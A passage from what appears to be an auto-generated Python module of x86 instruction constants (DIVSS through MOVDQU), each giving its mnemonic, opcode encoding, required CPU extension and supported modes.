``16/32/64-bit``
"""
EVEX_VDIVSS_XMM_K1Z_XMM_XMMM32_ER: int = 1461
"""
``VDIVSS xmm1 {k1}{z}, xmm2, xmm3/m32{er}``
``EVEX.LIG.F3.0F.W0 5E /r``
``AVX512F``
``16/32/64-bit``
"""
DIVSD_XMM_XMMM64: int = 1462
"""
``DIVSD xmm1, xmm2/m64``
``F2 0F 5E /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VDIVSD_XMM_XMM_XMMM64: int = 1463
"""
``VDIVSD xmm1, xmm2, xmm3/m64``
``VEX.LIG.F2.0F.WIG 5E /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VDIVSD_XMM_K1Z_XMM_XMMM64_ER: int = 1464
"""
``VDIVSD xmm1 {k1}{z}, xmm2, xmm3/m64{er}``
``EVEX.LIG.F2.0F.W1 5E /r``
``AVX512F``
``16/32/64-bit``
"""
MAXPS_XMM_XMMM128: int = 1465
"""
``MAXPS xmm1, xmm2/m128``
``NP 0F 5F /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMAXPS_XMM_XMM_XMMM128: int = 1466
"""
``VMAXPS xmm1, xmm2, xmm3/m128``
``VEX.128.0F.WIG 5F /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMAXPS_YMM_YMM_YMMM256: int = 1467
"""
``VMAXPS ymm1, ymm2, ymm3/m256``
``VEX.256.0F.WIG 5F /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMAXPS_XMM_K1Z_XMM_XMMM128B32: int = 1468
"""
``VMAXPS xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.0F.W0 5F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMAXPS_YMM_K1Z_YMM_YMMM256B32: int = 1469
"""
``VMAXPS ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.0F.W0 5F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMAXPS_ZMM_K1Z_ZMM_ZMMM512B32_SAE: int = 1470
"""
``VMAXPS zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst{sae}``
``EVEX.512.0F.W0 5F /r``
``AVX512F``
``16/32/64-bit``
"""
MAXPD_XMM_XMMM128: int = 1471
"""
``MAXPD xmm1, xmm2/m128``
``66 0F 5F /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMAXPD_XMM_XMM_XMMM128: int = 1472
"""
``VMAXPD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 5F /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMAXPD_YMM_YMM_YMMM256: int = 1473
"""
``VMAXPD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 5F /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMAXPD_XMM_K1Z_XMM_XMMM128B64: int = 1474
"""
``VMAXPD xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 5F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMAXPD_YMM_K1Z_YMM_YMMM256B64: int = 1475
"""
``VMAXPD ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 5F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMAXPD_ZMM_K1Z_ZMM_ZMMM512B64_SAE: int = 1476
"""
``VMAXPD zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst{sae}``
``EVEX.512.66.0F.W1 5F /r``
``AVX512F``
``16/32/64-bit``
"""
MAXSS_XMM_XMMM32: int = 1477
"""
``MAXSS xmm1, xmm2/m32``
``F3 0F 5F /r``
``SSE``
``16/32/64-bit``
"""
VEX_VMAXSS_XMM_XMM_XMMM32: int = 1478
"""
``VMAXSS xmm1, xmm2, xmm3/m32``
``VEX.LIG.F3.0F.WIG 5F /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMAXSS_XMM_K1Z_XMM_XMMM32_SAE: int = 1479
"""
``VMAXSS xmm1 {k1}{z}, xmm2, xmm3/m32{sae}``
``EVEX.LIG.F3.0F.W0 5F /r``
``AVX512F``
``16/32/64-bit``
"""
MAXSD_XMM_XMMM64: int = 1480
"""
``MAXSD xmm1, xmm2/m64``
``F2 0F 5F /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMAXSD_XMM_XMM_XMMM64: int = 1481
"""
``VMAXSD xmm1, xmm2, xmm3/m64``
``VEX.LIG.F2.0F.WIG 5F /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMAXSD_XMM_K1Z_XMM_XMMM64_SAE: int = 1482
"""
``VMAXSD xmm1 {k1}{z}, xmm2, xmm3/m64{sae}``
``EVEX.LIG.F2.0F.W1 5F /r``
``AVX512F``
``16/32/64-bit``
"""
PUNPCKLBW_MM_MMM32: int = 1483
"""
``PUNPCKLBW mm, mm/m32``
``NP 0F 60 /r``
``MMX``
``16/32/64-bit``
"""
PUNPCKLBW_XMM_XMMM128: int = 1484
"""
``PUNPCKLBW xmm1, xmm2/m128``
``66 0F 60 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPUNPCKLBW_XMM_XMM_XMMM128: int = 1485
"""
``VPUNPCKLBW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 60 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPUNPCKLBW_YMM_YMM_YMMM256: int = 1486
"""
``VPUNPCKLBW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 60 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPUNPCKLBW_XMM_K1Z_XMM_XMMM128: int = 1487
"""
``VPUNPCKLBW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG 60 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPUNPCKLBW_YMM_K1Z_YMM_YMMM256: int = 1488
"""
``VPUNPCKLBW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG 60 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPUNPCKLBW_ZMM_K1Z_ZMM_ZMMM512: int = 1489
"""
``VPUNPCKLBW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG 60 /r``
``AVX512BW``
``16/32/64-bit``
"""
PUNPCKLWD_MM_MMM32: int = 1490
"""
``PUNPCKLWD mm, mm/m32``
``NP 0F 61 /r``
``MMX``
``16/32/64-bit``
"""
PUNPCKLWD_XMM_XMMM128: int = 1491
"""
``PUNPCKLWD xmm1, xmm2/m128``
``66 0F 61 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPUNPCKLWD_XMM_XMM_XMMM128: int = 1492
"""
``VPUNPCKLWD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 61 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPUNPCKLWD_YMM_YMM_YMMM256: int = 1493
"""
``VPUNPCKLWD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 61 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPUNPCKLWD_XMM_K1Z_XMM_XMMM128: int = 1494
"""
``VPUNPCKLWD xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG 61 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPUNPCKLWD_YMM_K1Z_YMM_YMMM256: int = 1495
"""
``VPUNPCKLWD ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG 61 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPUNPCKLWD_ZMM_K1Z_ZMM_ZMMM512: int = 1496
"""
``VPUNPCKLWD zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG 61 /r``
``AVX512BW``
``16/32/64-bit``
"""
PUNPCKLDQ_MM_MMM32: int = 1497
"""
``PUNPCKLDQ mm, mm/m32``
``NP 0F 62 /r``
``MMX``
``16/32/64-bit``
"""
PUNPCKLDQ_XMM_XMMM128: int = 1498
"""
``PUNPCKLDQ xmm1, xmm2/m128``
``66 0F 62 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPUNPCKLDQ_XMM_XMM_XMMM128: int = 1499
"""
``VPUNPCKLDQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 62 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPUNPCKLDQ_YMM_YMM_YMMM256: int = 1500
"""
``VPUNPCKLDQ ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 62 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPUNPCKLDQ_XMM_K1Z_XMM_XMMM128B32: int = 1501
"""
``VPUNPCKLDQ xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F.W0 62 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPUNPCKLDQ_YMM_K1Z_YMM_YMMM256B32: int = 1502
"""
``VPUNPCKLDQ ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F.W0 62 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPUNPCKLDQ_ZMM_K1Z_ZMM_ZMMM512B32: int = 1503
"""
``VPUNPCKLDQ zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F.W0 62 /r``
``AVX512F``
``16/32/64-bit``
"""
PACKSSWB_MM_MMM64: int = 1504
"""
``PACKSSWB mm1, mm2/m64``
``NP 0F 63 /r``
``MMX``
``16/32/64-bit``
"""
PACKSSWB_XMM_XMMM128: int = 1505
"""
``PACKSSWB xmm1, xmm2/m128``
``66 0F 63 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPACKSSWB_XMM_XMM_XMMM128: int = 1506
"""
``VPACKSSWB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 63 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPACKSSWB_YMM_YMM_YMMM256: int = 1507
"""
``VPACKSSWB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 63 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPACKSSWB_XMM_K1Z_XMM_XMMM128: int = 1508
"""
``VPACKSSWB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG 63 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPACKSSWB_YMM_K1Z_YMM_YMMM256: int = 1509
"""
``VPACKSSWB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG 63 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPACKSSWB_ZMM_K1Z_ZMM_ZMMM512: int = 1510
"""
``VPACKSSWB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG 63 /r``
``AVX512BW``
``16/32/64-bit``
"""
PCMPGTB_MM_MMM64: int = 1511
"""
``PCMPGTB mm, mm/m64``
``NP 0F 64 /r``
``MMX``
``16/32/64-bit``
"""
PCMPGTB_XMM_XMMM128: int = 1512
"""
``PCMPGTB xmm1, xmm2/m128``
``66 0F 64 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPCMPGTB_XMM_XMM_XMMM128: int = 1513
"""
``VPCMPGTB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 64 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPCMPGTB_YMM_YMM_YMMM256: int = 1514
"""
``VPCMPGTB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 64 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPCMPGTB_KR_K1_XMM_XMMM128: int = 1515
"""
``VPCMPGTB k1 {k2}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG 64 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPGTB_KR_K1_YMM_YMMM256: int = 1516
"""
``VPCMPGTB k1 {k2}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG 64 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPGTB_KR_K1_ZMM_ZMMM512: int = 1517
"""
``VPCMPGTB k1 {k2}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG 64 /r``
``AVX512BW``
``16/32/64-bit``
"""
PCMPGTW_MM_MMM64: int = 1518
"""
``PCMPGTW mm, mm/m64``
``NP 0F 65 /r``
``MMX``
``16/32/64-bit``
"""
PCMPGTW_XMM_XMMM128: int = 1519
"""
``PCMPGTW xmm1, xmm2/m128``
``66 0F 65 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPCMPGTW_XMM_XMM_XMMM128: int = 1520
"""
``VPCMPGTW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 65 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPCMPGTW_YMM_YMM_YMMM256: int = 1521
"""
``VPCMPGTW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 65 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPCMPGTW_KR_K1_XMM_XMMM128: int = 1522
"""
``VPCMPGTW k1 {k2}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG 65 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPGTW_KR_K1_YMM_YMMM256: int = 1523
"""
``VPCMPGTW k1 {k2}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG 65 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPCMPGTW_KR_K1_ZMM_ZMMM512: int = 1524
"""
``VPCMPGTW k1 {k2}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG 65 /r``
``AVX512BW``
``16/32/64-bit``
"""
PCMPGTD_MM_MMM64: int = 1525
"""
``PCMPGTD mm, mm/m64``
``NP 0F 66 /r``
``MMX``
``16/32/64-bit``
"""
PCMPGTD_XMM_XMMM128: int = 1526
"""
``PCMPGTD xmm1, xmm2/m128``
``66 0F 66 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPCMPGTD_XMM_XMM_XMMM128: int = 1527
"""
``VPCMPGTD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 66 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPCMPGTD_YMM_YMM_YMMM256: int = 1528
"""
``VPCMPGTD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 66 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPCMPGTD_KR_K1_XMM_XMMM128B32: int = 1529
"""
``VPCMPGTD k1 {k2}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F.W0 66 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPGTD_KR_K1_YMM_YMMM256B32: int = 1530
"""
``VPCMPGTD k1 {k2}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F.W0 66 /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPCMPGTD_KR_K1_ZMM_ZMMM512B32: int = 1531
"""
``VPCMPGTD k1 {k2}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F.W0 66 /r``
``AVX512F``
``16/32/64-bit``
"""
PACKUSWB_MM_MMM64: int = 1532
"""
``PACKUSWB mm, mm/m64``
``NP 0F 67 /r``
``MMX``
``16/32/64-bit``
"""
PACKUSWB_XMM_XMMM128: int = 1533
"""
``PACKUSWB xmm1, xmm2/m128``
``66 0F 67 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPACKUSWB_XMM_XMM_XMMM128: int = 1534
"""
``VPACKUSWB xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 67 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPACKUSWB_YMM_YMM_YMMM256: int = 1535
"""
``VPACKUSWB ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 67 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPACKUSWB_XMM_K1Z_XMM_XMMM128: int = 1536
"""
``VPACKUSWB xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG 67 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPACKUSWB_YMM_K1Z_YMM_YMMM256: int = 1537
"""
``VPACKUSWB ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG 67 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPACKUSWB_ZMM_K1Z_ZMM_ZMMM512: int = 1538
"""
``VPACKUSWB zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG 67 /r``
``AVX512BW``
``16/32/64-bit``
"""
PUNPCKHBW_MM_MMM64: int = 1539
"""
``PUNPCKHBW mm, mm/m64``
``NP 0F 68 /r``
``MMX``
``16/32/64-bit``
"""
PUNPCKHBW_XMM_XMMM128: int = 1540
"""
``PUNPCKHBW xmm1, xmm2/m128``
``66 0F 68 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPUNPCKHBW_XMM_XMM_XMMM128: int = 1541
"""
``VPUNPCKHBW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 68 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPUNPCKHBW_YMM_YMM_YMMM256: int = 1542
"""
``VPUNPCKHBW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 68 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPUNPCKHBW_XMM_K1Z_XMM_XMMM128: int = 1543
"""
``VPUNPCKHBW xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG 68 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPUNPCKHBW_YMM_K1Z_YMM_YMMM256: int = 1544
"""
``VPUNPCKHBW ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG 68 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPUNPCKHBW_ZMM_K1Z_ZMM_ZMMM512: int = 1545
"""
``VPUNPCKHBW zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG 68 /r``
``AVX512BW``
``16/32/64-bit``
"""
PUNPCKHWD_MM_MMM64: int = 1546
"""
``PUNPCKHWD mm, mm/m64``
``NP 0F 69 /r``
``MMX``
``16/32/64-bit``
"""
PUNPCKHWD_XMM_XMMM128: int = 1547
"""
``PUNPCKHWD xmm1, xmm2/m128``
``66 0F 69 /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPUNPCKHWD_XMM_XMM_XMMM128: int = 1548
"""
``VPUNPCKHWD xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 69 /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPUNPCKHWD_YMM_YMM_YMMM256: int = 1549
"""
``VPUNPCKHWD ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 69 /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPUNPCKHWD_XMM_K1Z_XMM_XMMM128: int = 1550
"""
``VPUNPCKHWD xmm1 {k1}{z}, xmm2, xmm3/m128``
``EVEX.128.66.0F.WIG 69 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPUNPCKHWD_YMM_K1Z_YMM_YMMM256: int = 1551
"""
``VPUNPCKHWD ymm1 {k1}{z}, ymm2, ymm3/m256``
``EVEX.256.66.0F.WIG 69 /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPUNPCKHWD_ZMM_K1Z_ZMM_ZMMM512: int = 1552
"""
``VPUNPCKHWD zmm1 {k1}{z}, zmm2, zmm3/m512``
``EVEX.512.66.0F.WIG 69 /r``
``AVX512BW``
``16/32/64-bit``
"""
PUNPCKHDQ_MM_MMM64: int = 1553
"""
``PUNPCKHDQ mm, mm/m64``
``NP 0F 6A /r``
``MMX``
``16/32/64-bit``
"""
PUNPCKHDQ_XMM_XMMM128: int = 1554
"""
``PUNPCKHDQ xmm1, xmm2/m128``
``66 0F 6A /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPUNPCKHDQ_XMM_XMM_XMMM128: int = 1555
"""
``VPUNPCKHDQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 6A /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPUNPCKHDQ_YMM_YMM_YMMM256: int = 1556
"""
``VPUNPCKHDQ ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 6A /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPUNPCKHDQ_XMM_K1Z_XMM_XMMM128B32: int = 1557
"""
``VPUNPCKHDQ xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F.W0 6A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPUNPCKHDQ_YMM_K1Z_YMM_YMMM256B32: int = 1558
"""
``VPUNPCKHDQ ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F.W0 6A /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPUNPCKHDQ_ZMM_K1Z_ZMM_ZMMM512B32: int = 1559
"""
``VPUNPCKHDQ zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F.W0 6A /r``
``AVX512F``
``16/32/64-bit``
"""
PACKSSDW_MM_MMM64: int = 1560
"""
``PACKSSDW mm1, mm2/m64``
``NP 0F 6B /r``
``MMX``
``16/32/64-bit``
"""
PACKSSDW_XMM_XMMM128: int = 1561
"""
``PACKSSDW xmm1, xmm2/m128``
``66 0F 6B /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPACKSSDW_XMM_XMM_XMMM128: int = 1562
"""
``VPACKSSDW xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 6B /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPACKSSDW_YMM_YMM_YMMM256: int = 1563
"""
``VPACKSSDW ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 6B /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPACKSSDW_XMM_K1Z_XMM_XMMM128B32: int = 1564
"""
``VPACKSSDW xmm1 {k1}{z}, xmm2, xmm3/m128/m32bcst``
``EVEX.128.66.0F.W0 6B /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPACKSSDW_YMM_K1Z_YMM_YMMM256B32: int = 1565
"""
``VPACKSSDW ymm1 {k1}{z}, ymm2, ymm3/m256/m32bcst``
``EVEX.256.66.0F.W0 6B /r``
``AVX512VL and AVX512BW``
``16/32/64-bit``
"""
EVEX_VPACKSSDW_ZMM_K1Z_ZMM_ZMMM512B32: int = 1566
"""
``VPACKSSDW zmm1 {k1}{z}, zmm2, zmm3/m512/m32bcst``
``EVEX.512.66.0F.W0 6B /r``
``AVX512BW``
``16/32/64-bit``
"""
PUNPCKLQDQ_XMM_XMMM128: int = 1567
"""
``PUNPCKLQDQ xmm1, xmm2/m128``
``66 0F 6C /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPUNPCKLQDQ_XMM_XMM_XMMM128: int = 1568
"""
``VPUNPCKLQDQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 6C /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPUNPCKLQDQ_YMM_YMM_YMMM256: int = 1569
"""
``VPUNPCKLQDQ ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 6C /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPUNPCKLQDQ_XMM_K1Z_XMM_XMMM128B64: int = 1570
"""
``VPUNPCKLQDQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 6C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPUNPCKLQDQ_YMM_K1Z_YMM_YMMM256B64: int = 1571
"""
``VPUNPCKLQDQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 6C /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPUNPCKLQDQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 1572
"""
``VPUNPCKLQDQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 6C /r``
``AVX512F``
``16/32/64-bit``
"""
PUNPCKHQDQ_XMM_XMMM128: int = 1573
"""
``PUNPCKHQDQ xmm1, xmm2/m128``
``66 0F 6D /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VPUNPCKHQDQ_XMM_XMM_XMMM128: int = 1574
"""
``VPUNPCKHQDQ xmm1, xmm2, xmm3/m128``
``VEX.128.66.0F.WIG 6D /r``
``AVX``
``16/32/64-bit``
"""
VEX_VPUNPCKHQDQ_YMM_YMM_YMMM256: int = 1575
"""
``VPUNPCKHQDQ ymm1, ymm2, ymm3/m256``
``VEX.256.66.0F.WIG 6D /r``
``AVX2``
``16/32/64-bit``
"""
EVEX_VPUNPCKHQDQ_XMM_K1Z_XMM_XMMM128B64: int = 1576
"""
``VPUNPCKHQDQ xmm1 {k1}{z}, xmm2, xmm3/m128/m64bcst``
``EVEX.128.66.0F.W1 6D /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPUNPCKHQDQ_YMM_K1Z_YMM_YMMM256B64: int = 1577
"""
``VPUNPCKHQDQ ymm1 {k1}{z}, ymm2, ymm3/m256/m64bcst``
``EVEX.256.66.0F.W1 6D /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VPUNPCKHQDQ_ZMM_K1Z_ZMM_ZMMM512B64: int = 1578
"""
``VPUNPCKHQDQ zmm1 {k1}{z}, zmm2, zmm3/m512/m64bcst``
``EVEX.512.66.0F.W1 6D /r``
``AVX512F``
``16/32/64-bit``
"""
MOVD_MM_RM32: int = 1579
"""
``MOVD mm, r/m32``
``NP 0F 6E /r``
``MMX``
``16/32/64-bit``
"""
MOVQ_MM_RM64: int = 1580
"""
``MOVQ mm, r/m64``
``NP o64 0F 6E /r``
``MMX``
``64-bit``
"""
MOVD_XMM_RM32: int = 1581
"""
``MOVD xmm, r/m32``
``66 0F 6E /r``
``SSE2``
``16/32/64-bit``
"""
MOVQ_XMM_RM64: int = 1582
"""
``MOVQ xmm, r/m64``
``66 o64 0F 6E /r``
``SSE2``
``64-bit``
"""
VEX_VMOVD_XMM_RM32: int = 1583
"""
``VMOVD xmm1, r/m32``
``VEX.128.66.0F.W0 6E /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVQ_XMM_RM64: int = 1584
"""
``VMOVQ xmm1, r/m64``
``VEX.128.66.0F.W1 6E /r``
``AVX``
``64-bit``
"""
EVEX_VMOVD_XMM_RM32: int = 1585
"""
``VMOVD xmm1, r/m32``
``EVEX.128.66.0F.W0 6E /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVQ_XMM_RM64: int = 1586
"""
``VMOVQ xmm1, r/m64``
``EVEX.128.66.0F.W1 6E /r``
``AVX512F``
``64-bit``
"""
MOVQ_MM_MMM64: int = 1587
"""
``MOVQ mm, mm/m64``
``NP 0F 6F /r``
``MMX``
``16/32/64-bit``
"""
MOVDQA_XMM_XMMM128: int = 1588
"""
``MOVDQA xmm1, xmm2/m128``
``66 0F 6F /r``
``SSE2``
``16/32/64-bit``
"""
VEX_VMOVDQA_XMM_XMMM128: int = 1589
"""
``VMOVDQA xmm1, xmm2/m128``
``VEX.128.66.0F.WIG 6F /r``
``AVX``
``16/32/64-bit``
"""
VEX_VMOVDQA_YMM_YMMM256: int = 1590
"""
``VMOVDQA ymm1, ymm2/m256``
``VEX.256.66.0F.WIG 6F /r``
``AVX``
``16/32/64-bit``
"""
EVEX_VMOVDQA32_XMM_K1Z_XMMM128: int = 1591
"""
``VMOVDQA32 xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F.W0 6F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQA32_YMM_K1Z_YMMM256: int = 1592
"""
``VMOVDQA32 ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F.W0 6F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQA32_ZMM_K1Z_ZMMM512: int = 1593
"""
``VMOVDQA32 zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F.W0 6F /r``
``AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQA64_XMM_K1Z_XMMM128: int = 1594
"""
``VMOVDQA64 xmm1 {k1}{z}, xmm2/m128``
``EVEX.128.66.0F.W1 6F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQA64_YMM_K1Z_YMMM256: int = 1595
"""
``VMOVDQA64 ymm1 {k1}{z}, ymm2/m256``
``EVEX.256.66.0F.W1 6F /r``
``AVX512VL and AVX512F``
``16/32/64-bit``
"""
EVEX_VMOVDQA64_ZMM_K1Z_ZMMM512: int = 1596
"""
``VMOVDQA64 zmm1 {k1}{z}, zmm2/m512``
``EVEX.512.66.0F.W1 6F /r``
``AVX512F``
``16/32/64-bit``
"""
MOVDQU_XMM_XMMM128: int = 1597
"""
``MOVDQU xmm1, xmm2/m128``
``F3 0F 6F /r``
